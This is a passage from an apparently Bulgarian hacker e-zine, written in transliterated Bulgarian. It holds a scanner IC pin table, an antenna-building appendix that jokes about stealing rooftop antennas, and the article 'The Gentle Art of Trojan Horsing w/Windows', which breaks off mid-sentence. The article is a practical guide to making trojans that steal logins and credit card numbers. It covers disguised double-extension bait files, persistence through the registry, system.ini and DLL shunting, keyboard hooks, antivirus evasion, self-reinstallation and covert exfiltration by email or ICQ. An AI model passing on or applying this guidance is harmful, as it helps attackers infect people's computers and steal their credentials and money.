AR-2500 TA-7761P IC-13 Please verify? 9?
AR-3000 MC-3357P ? 16 13 9
AR-800 MC-3361N IC-200 16 13 9
AR-900 MC-3361N IC-201 16 13 9
AR-950 MC-3361N IC-201 16 13 9
BC-100XL MC-3359P IC-1 18 15 10
BC-100XLT TK-10421M-2 IC-401 20 16 11
BC-200XLT TK-10421M-2 IC-401 20 16 11
BC-205XLT TK-10421M-2 IC-401 20 16 11
BC-250 ? IC-3 16 13 9
BC-2500XLT TK-10930VTL IC-201 24 - 12-FM 13-AM
BC-3000 NFM/AM TK-10930V IC-202 24 - 12-NFM 13-AM
BC-3000 WFM TK-10489M IC-203 20 16-17 11
BC-350A NJM-3359D-A IC-3 18 15 10
BC-400XLT NJM-3359D-A IC-1 18 15 10
BC-560XLT NJM-3359D-A IC-1 18 15 10
BC-700A NJM-3359D-A IC-3 18 15 10
BC-760XLT NJM-3359D-A IC-2 18 15 10
BC-800XLT MC-3359P IC-1 18 15 10
BC-8500XLT MC-3361BP IC-9 16 13 9
BC-855XLT TK-10421M-2 IC-401 20 16 11
BC-890XLT NJM-3359D-A IC-3 18 15 10
BC-950XLT NJM-3359D-A IC-2 18 15 10
HX-1000 TK-10420 U-201 16 13 9
MR-8100 NJM-3359D-A IC-3 18 15 10
MX-5000 MC-3357P IC-4 16 13 9
MX-7000 MC-3357P IC-4 16 13 9
PRO-2002 MC-3357P IC-101 16 13 9
PRO-2003 MC-3357P IC-104 16 13 9
PRO-2004 NFM/AM TK-10420 IC-2 16 13 9 (TP4)
PRO-2004 WFM KB4419A IC-1 1 ? 6 (TP3)
PRO-2005 NFM/AM TK-10420 IC-2 16 13 9 (TP2)
PRO-2005 WFM KA2243N/HA12413 IC-1 1 - 10 (TP1)
PRO-2006 NFM/AM TK-10420 IC-2 16 13 9 (TP2)
PRO-2006 WFM KA2243N/HA12413 IC-1 1 - 10 (TP1)
PRO-2011 TK-10420 IC-1 16 13 9
PRO-2020 MC-3357P IC-101 16 13 9
PRO-2021 TK-10420 IC-2 16 13 9
PRO-2022 MC-3361N IC-1 16 13 9
PRO-2023 NJM-3359D-A ? 18 15 10
PRO-2024 MC-3361N IC-2 16 13 9
PRO-2025 NJM-3359D-A IC-1 18 15 10
PRO-2026 NJM-3359D-A IC-7 18 15 10
PRO-2027 MC-3361N IC-2 16 13 9
PRO-2028 NJM-3359D-A IC-2 18 15 10
PRO-2030 NJM-3359D-A IC-3 18 15 10
PRO-2035 NFM/AM TK-10420 IC-2 16 13 9 (TP2)
PRO-2035 WFM KA2243N/HA12413 IC-1 1 - 10 (TP1)
PRO-2042 NFM/AM TK-10420 IC-2 16 13 9 (TP2)
PRO-2042 WFM KA2243N/HA12413 IC-1 1 - 10 (TP1)
PRO-23 MC-3361BD IC-1 16 13 9
PRO-26 NFM/AM TK-10930V IC-14 24 - 12-NFM 13-AM
PRO-26 WFM TK-10489M IC-16 20 16-17 11
PRO-31 TK-10420 IC-1 16 13 9
PRO-32 TK-10420 IC-101 16 13 9
PRO-34 TK-10420 IC-101 16 13 9
PRO-35 TK-10421M-2 IC-401 20 16 11
PRO-36 TK-10420 IC-101 16 13 9
PRO-37 TK-10420 IC-101 16 13 9 (TP103)
PRO-38 MC-3359P IC-1 18 15 10
PRO-39 MC-3361N IC-201 16 13 9
PRO-41 MC-3359P IC-1 18 15 10
PRO-42 MC-3361N IC-2 16 13 9
PRO-43 TK-10427/-10420 IC-301 16 13 9
PRO-44 MC-3361N IC-201 16 13 9
PRO-46 TK-10421M-3LT IC-401 20 16 11
PRO-51 MC-3361BD IC-1 16 13 9
PRO-60 ? IC-301 16 13 9
Icom R-1 NFM TK-10487 DET-A IC-1 20 Q1 11
Icom R-1 WFM TA-7787AF DET-B IC-1 16 7 9
R-1600 NJM-3359D-A IC-2 18 15 10
R-4030 TK-10421M-2 IC-401 20 16 11
SR-15 TK-10421D-2 IC-1 16 13 9
TurboScan 2 3130-6056-502 U-201 18 ? 10 or 16
====================================================================
APENDIX B
---------
Kak da si naprawim wynshna antena?
Za razlichnite chestoti goleminata na antenite e syshto razlichna. Kato
konstrukcia te mogat da sa edni i syshti.
1. Naj prostia wariant e edna zhica opynata ot izhoda za antena. Za material
mozhete da izpolzwate wsichko: Medna zhica, telefonni zhichki. Dylzhinata
na zhicata tribwa da e kratna na dylzhinata na wylnata:
Za 46/49 Mhz triabwa da e okolo 1,60 m
Za 136 Mhz dylzhinata triabwa da e okolo 55 sm.
Za 146 Mhz dylzhimata triabwa da e okolo 50 sm.
Formulata za antena 1/4 dylzhina na wylnata e :
lamda(dylzhinata na wylnata) = 300 / freq. (freq w Mhz)
dylzhinata na ant. = lamda / 4 (dylzhinata e w metri)
Mozhete da izpolzwate 50 Ohm (!) koaxial cable, za da ia iznesete na
pokriwa. Konstrukcii :
(1) ³ (2a) ³ ant - kym zhiloto na coaxial
³ant. ³
³ ³
³ ³
³ coaxial 0
0-o========= = = = /³\ ----->gnd-masa-coaxial
B GND-masa / \º/ \
/ º \
/ º \
³ º
(2b) ³ ºcoaxial
³
o Pogled ot gore Pogled ot strani
/ \
/ \
/ \
(1) Naj prost wariant na antenata ot zhica swyrzana s coxial. Ne e ot
naj-dobrite, ponezhe ne e syglasuwana s kabela. Wypreki towa wyrshi dobra
rabota.
(2a/b) Antena ot tipa GroundPlane. Sistemata predstawliawa wertikalna
prychka, swyrzana kym zhiloto na coaxiala, i 3 radialni prychki, swyrzani
kym opletkata na kabela. Wertikalnata i 3 ostanali prychki sa s dylzhina 1/4
lamda. Trite prychki sa razpolozheni na po 120 gradusa (pogled ot gore) i na
45 gradusa nakloneni spriamo horizonta (pokriwa) - pogled otstrani. Takiwa
anteni se polzwaha nawremeto w TKZS-tata :-). Dawa po-dobri rezultati, tyj
kato e po-dobre syglasuwana i ima po-goliamo usilwane spriamo predishnata.
Mozhete da si otkradnete i antena ot Senao Phone, koito gi ima na dosta
pokriwi. No triabwa posle da podberete dylzhinata na prychkite. Mozhete da
izpolzwate i TV antena no togawa triabwa da se izchislat razmerite, i oswen
wsichko drugo tia shte e nasochena - koeto za tezi nuzhdi shte e
nedostatyk :-(.
Idei mnogo. Mozhete da improwizirate kolkoto iskate. Za poweche info i
pomosht - ima si mail za taia radota (pyk i #phm i #phreak ;-)!
Ako ima interes kym tozi tip phreak, shte podgotwia oshte edna statijka :-)
Ako imate idei za drug radio-phreak, za poweche info ili za tehnicheska
consultacia (mozhe i da me napsuwate ako iskate :-PPP), pishete na mail-a:
ludphreak@yahoo.com
LudPhreak
>> EOA <<
]]><![CDATA[
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#09ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
[ a r t i c l e ] [ a u t h o r ]
The Gentle Art of Trojan Horsing w/Windows EXo
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
i. Intro
Mnogo mi e trudno da izmislq wuwedenie kum tazi statiq, tyj kato po temata
se izpisa dosta material, a i w tozi broj suwsem ne sme ostanali na suho. Za
troyanski kone weche sa chuwali i bezdetninte majki i klosharite, che dori
i BTK-arite. Weroqtno ste e naj- dobre, predi suwsem da se otkavete ot
Phreedom Magazine, da wi uwerq, che nqma mqsto za pritesnenie ako prosto
weche wi e omruznalo da slushate za trojan horsing, zastoto, makar i temata
da e sred liubmite mi, tq dosta se poizcherpa i statiq tlusta tolkoto tazi e
mnogo weroqtno da ne se poqwi skoro wuw Phreedom Magazine. Wse pak sym se
postaral da obhwana wsichkite po-interesni momenti, swurzani sus
suzdawaneto, razprostranenieto i dejnostta na troyanskite kone, koito dosega
ne sa bili zastupwani w predishni broewe.
Nqmam pretencii za maximalna izcherpatelnost i ako nqkoj ima interesni idei,
neka prasta smelo. Mnogo se kolebah dali da blusna i towa, koeto go ima w
starite broewe po temata,i da polucha edin complete tutorial, no reshih, che
wse pak ne move wyw wseki broj edno i susto da si pishem, taka che kojto
iska, neka otide i widi predishnite publikacii. Viwot i zdrawe, nqkoj den
sys Solar-a ste se hwanem i ste napishem edin prostranstwen article za
horsing, w kojto ste ima wsichko ot fake- kone do VxD coding [2][5] i
advanced sniffing tehniki.
(Zabelevka: Wsichko swurzano s CC Phishing-a ste namerite w article-a na
Star Gruhtar).
Gorniqt abzac maj go biwa za intro i predi da zapochna sys systestwenata
chast ste kava samo, che pisaneto na troyanski kone suwsem ne e tolkowa
slovno, kolkoto si mislqt tezi, koito polzwat gotowi bozi ot sorta na Back
Orifice i NetBus, naglo tituluwani "remote administration toolkits". Smqtam,
che na wseki mu e qsno, che se predpolaga da imate minimalni znaniq po
Windows Programming, kakto i nqkakwi helpowe [10] i compilator [2] pod ruka,
ta dori i malko velanie i wie da naprawite nesto, a ne da poluchite wsichko
nagotowo.
Po tozi powod predi izwestno wreme se poluchi edin gnewen mail, w kojto
nqkakuw tip bezmilostno psuwashe, che edi koq si definiciq na fuknciq ne
bila taka i taka, ami mnogo greshna. Okaza se, che prosto pichut bil tolkowa
bezdaren, ta ne prochel prednite dwa-tri reda ot article-a i zatowa ne
razbral za kakwo stawa duma. E na takiwa kreteni nqma kak da im pomogne
chowek.
Zapretnete rykawi i ne se strqskajte ot neuspehite...
ii. Sto e to trojan horse i za kakwo se izpolzwa
Troyanskite kone, naj-obsto kazano, sa background procesi, izwurswasti
dejnosti bez washeto znanie i naj-weche protiw wolqta wi. Prisustwieto na
troyanski kon e rezultat ot washeto newnimanie. Winata za towa, che imate
troyanski kon, obiknoweno e izcqlo washa, tyj kato wie ste pozwolili (po
newnimanie ili po nqkakwa druga prichina) procesut na kon-q da se instalira
i startira na mashinata wi.
Eto taka izglevda maximalno abstraktnata definiciq za troyanski kon, koqto
movah da izmislq. Ot tuk natatuk sledwa edno bogato raznoobrazie ot
dejnosti, koito mogat da izwurshwat konete, nachini, po koito move da budat
instalirani i t.n. W tazi statiq, kakto si lichi ot zaglawieto, sa
razgledani Windows-orientiranite pruhtelnici, no ako wse pak iskate da
razberete kak stoqt nestata pri Linux-a, naj- dobre da prochetete i na
IronCode statiqta.
Nqkoi ot osnownite priloveniq na trojan horsowete:
* Troyanski kone za priswoqwane na chuvdi accounti - naj-razprostranenite
kone, chiqto edinstwena cel e da prilapat opredelen wid accounti (bili te
Dial-up, FTP, telnet, mail ili drugi). Sled kato hwanat nqkakuw account,
te go izprastat po daden nachin do sobstwenika na konq, w rezultat na
koeto toj se sdobiwa s chuvdite personalni danni.
Naj-razprostranen w Bulgaria e wariantut, kojto sledi samo za Dial-up
accounti, tuj kato dostuput do ISP-tata w BG e priwilegiq samo na
po-zamovnite tipowe. Tozi tip kone move da ima i wgraden sniffer ili
keyboard capturing sistema.
* Troyanski kone za flood - nashumqha sled nqkolkoto ataki srestu surwurite
na BTC, poluchili otzwuk po celiq swqt. Ideqta na tezi kone e da generirat
trafik kum daden server, kato po tozi nachin, pri ewentualno dobro
razprostranenie na konq, da flood-nat server-a. Intersni sa ne samo ot
anarchichna gledna tochka, a i zaradi towa, che w tqh se prilagat tehniki,
wuzpolzwasti se ot nedomislici w TCP/IP protokola. Zastita srestu ataka,
generirana s takuw wid trojan horse wse oste ne e izmislena, a i samiqt i
nachin na dejstwie ne predpolaga zastita.
(Bel.Iron - vsushtnost, kakto i da beshe napisan TCP/IP, edva li shteshe
da ima zashtita sreshtu takava ataka. Taka che za nedomislici ne znam
dali mozhe da se govori...)
* Keyloggers - towa sa kone, koito sledqt wsichko, koeto e wuwedeno ot
klawiaturata. Izpolzwat se obiknoweno za durpane na kreditni karti, kato w
tozi im wariant te ne prihwastat wsichko, koeto se wuwevda ot kbd-to, a
samo tazi chast, koqto ima nqkakyw shans da e informaciq za kreditna
karta.
Pishat se srawnitelno lesno i sa udobna alternatiwa za celi kato
razuznawane i spionav.
* Blow-up trojan horses - onzi wid kone, kojto ste gleda po wuzmovno
naj-burziq nachin da wi zatrie HDD-to ili naj-malkoto da prichini nqkakuw
damage. Bqha mnogo populqrni po wremeto na BBS sitemite, koito raboteha
predimno pod DOS i bqha otworeni za golqm broj anarhistichni ataki.
Lamerska istoria. Izwesten e trojan horse ot tozi wid, kojto ne
predstawlqwa nisto poweche ot kompiliran .bat file, sudurvast w sebe si
edna "format c:" komanda.
* Remote administration tools - zad towa grandiozno ime se kriqt wsichki
onezi programki, koito twurdqt, che trqbwa da se izpozlwat samo ako iskate
da si administrirate PC-to prez mrevata. BULLSHIT. Chista proba kone za
lameri. Obiknoweno imat nqkakyw pseudo-command interpretator ili naprawo
prawqt gate kym command.com-a.
Estestweno, towa sa samo osnownite widowe troyanski kone, koito sa
naj-shiroko razprostraneni. Razrabotki po temata ima wsqkakwi, nqkoi ot
koito tolkowa exotichni, che chowek trudno bi si predstawil trojan horsinga
w podobna swetlina (naprimer na sustezanie po informatika wmesto reshena
zadacha se predawa troyanski kon, kojto prerawq HDD-to na vurito w tursene
na otgoworite na zadachite i ako gi nameri naprawo gi pliue sled 10-20 sec.
delay, simulirajki prez towa wreme usilena rabota).
(Bel.Iron - ne se hilete, v otbor s EXo tova naistina go napravihme vednuzh,
no ne pliueshe reshenieto, ami ni prashtashe na nas testovete, za da si
vidim greshkata. Opravihme se obache predi da doidat blaginkite :-)
Metalista puk realizira gornia variant uspeshno ;-)
iii. Zaribqwane
Troyanskiqt kon, kakto beshe opisano w definiciqta, dejstwa bez znanieto na
sobstwenika na PC-to, na koeto raboti, i sledowatelno startiraneto na
troyanski kon stawa po po-osoben nachin, t.e., vertwata trqbwa da bude
prilugana da pusne trojan horse-a, i to bez wyobste da razbre, che e
naprawila nesto neredno. Procesut na prilugwane na vertwata i instalirane na
konq se naricha naj-obsto zaribqwane. W broj 17 sa opisani osnownite metodi
za zaribqwka ( po e-mail, prez IRC, ICQ i t.n.), a w broj 19 sa opisani
metodi za namirane na e-maili na ewentualni vertwi.
Edin interesen metod, kojto ne e spomenawan dosega, e prez auto-runned CD.
Tyj kato mnogo sistemi sa s pusnata autorun opciq na Windows-a, movete lesno
da priluvete nqkoj da se si nabuta koncheto wi, dori da se pishe za golqm
hitrqga.
Edin ot naj-tupanarskite metodi puk e izprastaneto na file s ime ot wida
abc.jpg .exe
^^^^^^^^^^^^^^^^ nad 200 spacii
, kojto w ICQ si izglevda tamun kato .jpg i po-newenimatelniqt i dowerchiw
user move da go otwori bez problem. Podobni fileowe izglevdat w windows
folder explorer-a kato "abc.jpg ..." pri polovenie, che e pusnat "detailed
view" na failowete. Trikut raboti i pri nqkoi IRC klienti, a interesnoto e,
che nqkoi wersii na ICQ dave zabiwat, kogato im se izprati file s prekaleno
dulgo ime.
Nqkoi hora mnogo si padat po on-join send-a w IRC kanalite. Towa weche rqdko
raboti uspeshno, no ako nqkoj wse pak se hwane e sigurna zaribqwkata.
Drug metod, kojto puk beshe opisan w PHM20 e instaliraneto na troyanski kon
samo s edno razarhiwirane na .zip. Ako se setq za oste nqkoj, ste dobawq i
nego predi zawurshwaneto na statiqta, no pochti sigurno sum izpusnal nqkoj
metod za zaribqwka/razprostranenie, taka che ne se strahuwajte da se
oslanqte na wuobravenieto si.
Estestweno, dobre e da izpipate do maximum scenariq za zaribqwkata, tyj kato
imenno tuk social engeneering tehnikite igraqt naj-wavna rolq. Move da imate
neweroqtno dobre naprawen konec, kojto da ne movete da probutate na nikogo,
zastoto ne umeete da luvete dobre. Na towa, estestweno, nikoj ne move da wi
nauchi...
iv. Startirane
Sled kato konqt se e instaliral, ima nqkolko nachina da go startirate pri
wsqko zarevdane na Windows-a:
* prez system.ini - move-bi na malko hora sa izwestni "run=" i "load="
poletata w [boot] sekciqta na system.ini, koito sa ostanali oste ot
Windows 3.1 i pozwolqwat zarevdaneto na programa sus startiraneto na
windows-a. Wsustnost w dobroto staro wreme towa beshe edinstweniqt nachin
da zaredim programa bez towa qwno da se wivda w StartUp folder-a. Tozi
nachin obache wse oste raboti s Win9x sistemite.
Wsustnost, kato se zamislq, "shell=" komandata susto move da bude
promenena, taka che wmesto explorer.exe da se zarevda wash sobstwen shell,
kojto prosto da e troyanskiqt kon, startirast se i posle startirast
explorer.exe. Ne sum go probwal, no kato gledam, ima shansowe da raboti.
* prez registry-to - naj-standartniqt nachin za zarevdane na software, kojto
se izpolzwa ot wsqka wtora shareware programa. Za nestastie e lesno
otkriwaem, ako ne sme si naprawili truda da zamaskirame .exe-to pod
nqkakwo hubawo ime. Poglednete sekciq
Software\Microsoft\Windows\CurrentVersion\Run na HKEY_CURRENT_USER i ste
razberete za kakwo stawa duma.
* winstart.bat - towa e file-ut, kojto se izpolzwa pri instalacia na
software, imast za cel da zameni nqkoj sistemen file, kojto se izpolzwa po
wreme na instalaciqta na daden software. Polezen e w nashiq sluchaj s towa
si swojstwo, che se zarevda predi da se pusne samiqt krnl386.exe i predi
da se bootnat kakwito i da bilo .dll-i, .drv-ta, .vxd-ta i t.n.
* prez hacknato .exe ili .dll - tozi method predpolaga, che ste naqsno s PE
i LE [14] strukturte na executable failowete i dynamichnite biblioteki,
koito se izpolzwat ot Windows. Taka che prosto prenarevdate programnite
segmenti i zamenqte startup tochkata s wash kod, kojto prilepqte kum
.dll-to ili .exe-to. Tozi wash kod posle wika originalniq kod na DLL-to.
Tozi metod e izdurvan logicheski, no zasega ne sum go wivdal realiziran.
(Bel.Iron - vsushtnost tova si e suvsem kato zaraziavane s virus)
Imajte w predwid i fakta, che po wreme na rabota na sistemni .dll-ta ne
movete da gi pipate poradi sharing ogranicheniq. W tozi sluchaj trqbwa da
tursite nqkakwa alternatiwa za instalaciq (naprimer winstart.bat).
* chrez shuntirane na .dll - prawite si wash .dll sus sustoto ime kato nqkoj
sistemen .dll i w init procedurata slagate kod za loadwane na konq. Sled
towa otnowo se wika originalnoto .dll. Wnimawajte da si wzemete wsichki
exportowe i da gi slovite wuw washeto .dll, taka che to da izglevda dosust
kato originalnoto.
Tezi osnowni metodi e dobre da se kombinirat edin s drug, taka che ako
ediniqt grumne, konqt da produlvi da se loadwa.
Dobre e da si kompresirame konq i da se postaraem da stane wuzmovno
naj-malyk, zastoto nikoj ne obicha da durpa golemi failowe, a golqmata posta
e podozritelna. Za celta move da se izpolzwa compresirasta programa ot sorta
na Petite, makar che wuprosniqt .EXE compressor [6][7][8] se duni ponqkoga
ako .exe-to wi ima po-osobena struktura. Izpolzwaneto na nqkoi
anti-debugging techniki susto ne e losha ideq, tyj kato wednuv hvanat, konq
ste bude raznisten, za da se razbere kakwo prawi [15].
v. Sledene za danni
W krajna smetka, za da poluchite nesto ot kompiutera, na kojto e pusnat
troyanskiq kon, trqbwa purwo da si ulowite towa, koeto wi e nuvno. Tuk
otnowo ima nqkolko osnowni metoda.
* windows hooking - standartnoto windows-ko API ni predostawq wuzmovnostta
da slagame t.nar. hook-owe, koito ni pozwolqwat da sledim za opredeleni
subitiq ili po-tochno kazano za opredelni message-i, predawani na
priloveniqta. S tqhna pomost lesno movem da se nabutame tochno w momenta
predi da se zatwori daden dvam i da si wzemem informaciq ot poletata mu,
kato imame garanciq za towa, che tq e naj-aktualnata. Izpolzwa se
funnkciqta SetWindowsHookEx, kato informaciq za neq ste namerite w
standartniq API Help na Microsoft ili w MSDN.
Ideqta e, che wie suzdawate sobstwena funkciq, koqto, sled kato se setne
hook-a, se izwikwa pri tochno opredeleni uslowiq. Tuj kato s pomostta na
kookowete movete da prihwanete na praktika wsqko subitie (dori dwiveneto
na mishkata po ekrana), izpolzwaneto im e za preporuchwane dori pred nqkoi
po-advanced tehniki, tuj kato nqma nuvda da burkate nawutre w sistemata.
Naprimer movete da sledite za poqwqwaneto na Connect To dialog box-a i
tochno sled kato user-ut natisne connect, da si wzimate sudurvanieto na
textowite poleta. Ili puk po podoben nachin da sledite SecureCRT ili
standartnata telnet sesiq, kogato se suzdawa now connection i da grabnete
logina i parolata - nesto, koeto e nemislimo da se naprawi po drug nachin,
osobeno ako connection-ut e cryptiran.
Nedostatuk na tozi metod e, che se lowi ot software kato Dr.Watson, kojto
dawa advanced info za sistemata i zaredenite driveri/procesi. Wivte 17-ti
broj za poweche example-i.
* keyboard capturing - mnogo e polezen i ima na praktika neogranicheno
prilovenie. Movete ot edna strana da go izpolzwate, kogato nqkoj wuwevda
ruchno dadena authorizaciq, ili za da hwastate wsichki formi, koito sa
bili submitnati prez nqkoj browser. Wtoroto ni pozwolqwa da lowim i
creditni karti, kato prosto si tracirame wsichko, koeto minawa prez
browsera, a kogato zasechem nomer na CC, zapazwame 1kb napred i 1 kb
nazad. Nachinite za low na CC s podobni tehniki sa opisani po-podrobno w
statiqta na StarGruhtar. Nestoto, za koeto trqbwa da wnimawte tuk, sa
natisnatite Caps Lock i Shift, tyj kato te opredelqt malki i golemi bukwi.
* sniffing - sniffwaneto e osnowna tehnika, koqto se izpolzwa pri probiw na
Linux sistemi. Ideqta e da prihwastate wsichkiq trafik na niwo TCP/IP i,
filtrirajki connection- ite, da nalowite wecherqta. Za celta trqbwa da se
napishe VxD [4][13], kato informaciq za pisaneto na .vxd-ta ima w PHM19.
Dobre e ako ne znaete kakwo e snifing da prochetete statiata na kay ot
tozi broj. Solar Eclipse w momenta raboti i po libpcap modul za WinNT,
kojto wi dawa wuzmovnost da pishete snifferi za windows, no dali i koga
ste go zawurshi e trudno za predskazwane.
* zabluda na protiwnika - towa e osoben social engeneering method, kojto e
wuzmovno naj-lamerskoto reshenie za trojan horse, no e uchudwasto kolko
chesto raboti. Nuvno e da naprawite programa, koqto ima pretencii da
izwurshwa nesto, swurzano s authorization-a, kojto wi interesuwa, i ako
programata e naistina chitawa i wurshi nesto polezno (kato mevduwremenno
si wzima kakwoto i trqbwa), to budete sigurni, che dosta useri ste se
nalowqt poradi sobstwenoto si lekowerie.
Naj-stariqt mi izwesten BG trojan horse za accounti dejstwashe imenno na
tozi princip - prawi se na programa, koqto prowerqwa online wremeto na
userite. Scenarii w towa otnoshenie mogat da se izmislqt mnogo.
vi. Pazene i izprastane na subranata informaciq
Estestweno e, che trqbwa da si pazite nqkude infoto, koeto weche ste
subrali, dokato ne se izprati do was po email [12] ili po nqkakuw drug
nachin. Kudeto i da si durvite mevdinnite danni, bilo to w registry-to ili w
nqkakuw file na HDD- to ili bog znae kude, e preporuchitelno da kodirate
kakwoto move, taka che da ne si go nameri nqkoj sluchaen minuwach. Pri
izprastane na email- a puk e absolutno zadulvitelno da go kodirate predi
towa, i to po wuzmovnost s nqkakuw hitur algoritum (PGP[9], makar i malko
po-slovno za linkwane, e mnogo dobra ideq). Move da naprawite konq si da
syzdawa nqkakwa tablica za kodirane, koqto da se generira spored lokalnata
konfiguraciq. Sled towa po mail prastate nekodirani samo wuprosnite danni,
koito sa izpolzwani za baza i kato si poluchite mail-a imate garanciq, che
samo wie znaete kak da si go razkodirate.
Izprastaneto na dannite ot swoq strana susto move da bude napraweno po
razlichni nachini spored situaciqta, no obiknoweno se izpolzwa submitwane po
e-mail. Ako si poigraete malko poweche sigurno movete da si izrabotite i
submitwane po ICQ, koeto ste budi po-malko podozreniq, tyj kato dori i da ne
si skriete connection-a kum mailserver-a, nqma da se wivda nqkakuw stranen
connection w netstat-a, a wruzka sys server-a na mirabilis. Tyj kato
ICQ-tata [1] poddurvat wse oste dori po-starite protokoli (2,3,4), movete da
si namerite mnogo lesno info za tqh, a prastaneto na prost message sywsem ne
e golqma filosofiq. Wivdal sum ICQ-baziran kon, kojto bachka na
client-server princip i e nesto, za koeto awtorite na BO mogat samo da si
mechtaqt. Estestweno, tozi kon ne e publichno dostqnie i e edin ot
naj-dobrite, za koito znam.
Mnogo e stranno, che dosta hora izpitwat zatrudneniq imenno s code-a za
prastaneto na e-mail. Wupreki towa wi preporuchwam da ne izpolzwate razni
gotowi biblioteki, a da si napishete nesto izcqlo washe. Az lichno sum
uspqwal da subera wuprosnata sendmail procedura w 20 reda na C, pri towa s
izchakwane na respons-owete i error handling. A za towa ne se iska mnogo
filosofiq - nedejte da se glezite.
vii. Kofti momenti i dobri idei
Kofti momentite pri pisaneto na troyanski kone suwsem ne sa malko i ponqkoga
stawat razni gadni ulowki, koito mogat da wi spunat progresa za 3-4 dena.
Wsustnost ima nqkoi osnowni nesta, koito ne trqbwa da prawite ili za koito
trqbwa da znaete.
* WriteFile skapwa hookowete - neznajno zasto WriteFile skapwa hookowete pri
pisane. Kogato si praweh keylogger za NT mi trqbwashe dosta wreme da
shwana, che problemut ne e w logikata na logger-a, a w towa, che se
opitwah direktno ot hook procedurata da pisha w edin file. Towa,
estestweno, se oprawq mnogo lesno, kato si slovite edin timer, kojto prez
opredelen interwal ot wreme da prowerqwa nqkakwo buferno mqsto (napr. key
w registrito) dali sa se poqwili nowi danni, koito da se save-nat wuw
filecheto. Strannoto e, che pod Win9x toq bug go nqma ili pone ne se e
proqwqwal.
* Pri metoda sys system.ini, opisan po-gore, ako sme se hook-nali predi da
se zaredi systray-a, prosto movem da zabrawim da ni bachkat hookowete.
Oste edin misteriozen bug, kojto mi otne pochti sedmica, dokato se usetq
zasto wsustnost hook-a ne bachka sled restart, pri polovenie, che procesut
si wurwi.
Naj-dobrata ideq obache, koqto mi idwa kato ewentualen solution, e da si
naglasim timer, kojto da izchakwa 20-tina sekundi i chak togawa da se
izpulnqwa sustinskata chast ot code-a na konq (t.e. slaganeto na hookowete
i t.n.)
* Mnogo lesno se izlowqwat konete, koito ne sa se pogrivili da oprawqt
sobstwenata si data sled instaliraneto. Na lamerite, kolkoto i da sa
lameri, im stiga akyla ponqkoga da podredqt failowete po data i chas na
suzdawane. I kato widqt nashiq kon s naj-nowa data, wednaga se doseshtat,
che tuj viwotno otskoro poklasta opashka w sistemata i sledowatelno e
dosta podozritelno. Pomislete za towa kakwa data ste imat filowete wi sled
instalirane.
* Hookowete ne bachkat, ako ne sa w otdelen DLL - makar che ako si prochetem
Microsoftskiq help za SetWindowsHookEx ste ni se stori, che movem da
blusnem w edin file kakto thread-a, taka i hook-a. Towa e donqkude istina,
samo che hook-a bachka samo za lokalniq process, koeto wyobste ne ni wurshi
rabtota. Eto zasto trqbwa da si slagame hookchetata w .DLL i da si gi
wzimame ot tam sys standartnite funkciiki na Windows API-to.
* Wednuv razpoznat, konqt se lowi lesno ot antiwirusnite programi - ako
antiwirusnite programi usetqt koncheto wi, wednaga ste grumnat wsichkite
wi zaribeni PC-ta. Za taq cel move da se izmisli algoritum, kojto da smenq
imeto na programata. Primerno tursi nqkoe .exe w windows ili system
direktoriqta i se krustawa po sustiq nachin, samo che s "32" otzad.
Naprimer ot "progman.exe" stawa "progman32.exe". Ako se naprawi i fake
promqna na dulvinata na .exe-to, ste zabludite antiwirusnite softuerni
produkti dosta po-uspeshno.
* Trqbwa da se pomisli za nqkolko alternatiwni nachina za wuzstanowqwane na
konq, taka che ako nqkoj se useti ot kude se zarezhda toj i go iztrie,
konqt posle sam da si se instalira pak.
* Live update ste zwuchi za dosta hora stranno w kontexta na horsinga, no si
pomislete kolko ste e podwiven konqt wi, ako ima live-update funkcii.
Spokojno ste movete da updatewate wsichkite zaribeni userski mashini s
nowite po-dobri wersii. A da se naprawi live-update suwsem ne e trudno.
Eto nqkolko metoda:
1) suzdawate si nqkakwa stranica, indexirate q w AltaVista, a konqt wi
prosto tursi za opredelen string. Sled kato go nameri, prawi version
check, wzima si po- nowa wersiq i e dowolen. Download-waneto na nowa
wersiq stawa samo s wikane na fuknciq FTPGetFileEx() (ili nesto takowa)
ot wininet.dll.
2) Slagate si daemon na daden server, kojto sluhti na nqkoj-si port, ili
puskate IRC bot, kojto da prasta update-a.
3) Pop-wate opredelen email (dosta dobra ideq), kato ne se triqt msg-tata.
Konqt prowerqwa za naj-nowata wersiq i si q durpa bez da trie e-maila.
Wyobste, idei mnogo, stiga da imate velanie.
* S pomostta na Resource Workshop movete da si smenite ICON-ata na konq,
taka che da izglevda kato self-extracting .EXE ili kato setup file ot Wise
Solutions. Estestweno, towa move da naprawite oste pri kompilaciqta. Dobre
e da si smenite i version infoto na .exe-to taka, che da otgowarq na
ikonata.
viii. Zakliuchenie
Predi 2 meseca sus solar-a se hwanahme i edna wecher zapochnahme da rowim w
IE4, za da namerim kude tochno se obrabotwa formata predi da se pusne po
secure connectiona. Iskahme da go hwanem towa mqsto, zastoto pri IE4 ne
movem prosto taka da wzemem sudurvanieto na poletata w dadena stranica, tuj
kato te sa OwnerDraw. Roweneto beshe mnogo zdrawo... 12 chasa debuging (az
uspqh da izdurva kum 10, ostanalite 2 ostana solar-a).
Osnownata ideq beshe da hwanem wsichki izwikwaniq na string funkciite
(strlwr, strstr i t.n.) w kernel32.dll i da widim koga ste pochnat da se
poqwqwat dannite ot formata [11]. A te se izwikwat stotici puti. Estestweno,
s edin macros na SoftIce movem da ukavem da break-wa samo ako parametrite
sudurvat tochno opredelen string, no dori i tozi metod ne pomaga mnogo, tuj
kato string funkciite produlvawat da si se izwikwat mnogo puti s edin i
susti string.
Kakto i da e, purwiq den rezultatut beshe pochti nulev. No na wtoriq za
stastie rabotata stana, w rezultat na koeto Solar-a izolira tochno toq
offset, kojto otgowarq na mqstoto, pri koeto ako se nabuta wunshen kod, move
da se izmuknat dannite za daden form submission. Problemut beshe, obache,
che za razlichni wersii na explorer-a .dll-to, w koeto stawashe action-a
(mshtml.dll), e razlichno, makar i samo s nqkolko byte-a.
Ideqta ne nameri prilovenie na praktika, wupreki che ako bqhme napisali
takuw kon, toj steshe da lowi wsichko, koeto minawa prez IE4 formi. Ot druga
starana, za sustoto wreme movehme da suzdadem dosta dobur keyboard-capture,
kojto s edna stabilna logika da otsqwa samo tiq requesti, koito
